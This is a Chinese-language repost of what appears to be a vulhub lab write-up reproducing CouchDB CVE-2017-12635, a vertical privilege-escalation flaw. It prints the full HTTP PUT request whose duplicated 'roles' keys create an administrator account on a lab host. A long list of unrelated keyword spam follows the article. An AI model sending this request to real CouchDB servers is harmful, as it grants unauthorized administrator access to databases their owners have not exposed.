couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的
发表于:2025-01-19 作者:千家信息网编辑
千家信息网最后更新 2025年01月19日,这篇文章将为大家详细讲解有关couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。Cou
千家信息网最后更新 2025年01月19日couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的
这篇文章将为大家详细讲解有关couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 "Couch" 是 "Cluster Of Unreliable Commodity Hardware" 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也是如此。
CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
下面仅作漏洞复现记录与实现,利用流程如下:
一、漏洞环境
目标链接:http://192.168.101.152:5984/
直接访问是这样子的
访问http://192.168.101.152:5984/_utils/后如下
直接点击_users会提示无权访问数据库
二、利用流程
首先发送第一个数据包,会提示403错误,提示只有管理员可以设置角色
但发送包含两个roles的数据包,即可绕过限制,创建一个管理员账户,这里创建了一个账户密码皆为vulhub的管理员账户
PUT /_users/org.couchdb.user:vulhub HTTP/1.1Host: 192.168.101.152:5984Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 108{"type": "user","name": "vulhub","roles": ["_admin"],"roles": [],"password": "vulhub"}
再回到前台登录,已经可以访问了
关于couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
管理
数据
管理员
账户
提示
内容
数据库
文章
更多
流程
目标
知识
篇文章
不同
不错
两个
前台
只有
可以通过
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
辽宁民主评议软件开发公司
软件开发公司的人员有哪些
文件存储到数据库的优缺点
搅拌站机组数据库包含哪些
vb数据库连接用户登录
成都工控软件开发定制费用
软件开发收费二维码
九月网络安全法规
anki海外服务器
服务器虚拟化的主要方式
无线接入网络技术
服务器上的任务管理器快捷键
计算机网络技术最后一道大题
小盒科技cmo教育产业互联网
山东网络技术大赛资格赛
小白测评微信数据库
合江软件开发有限公司
常熟市网络安全态势感知平台
济南java软件开发团队
互联网新闻最新科技
紫光国微做服务器吗
服务器 桌面管理器
软件开发公司的人员有哪些
数据库基本界面
网络安全实训指导教师
北纬科技的互联网彩票
经济基础数据库
奥丁一直服务器忙
云平台服务器管理软件
人社网络安全自查报告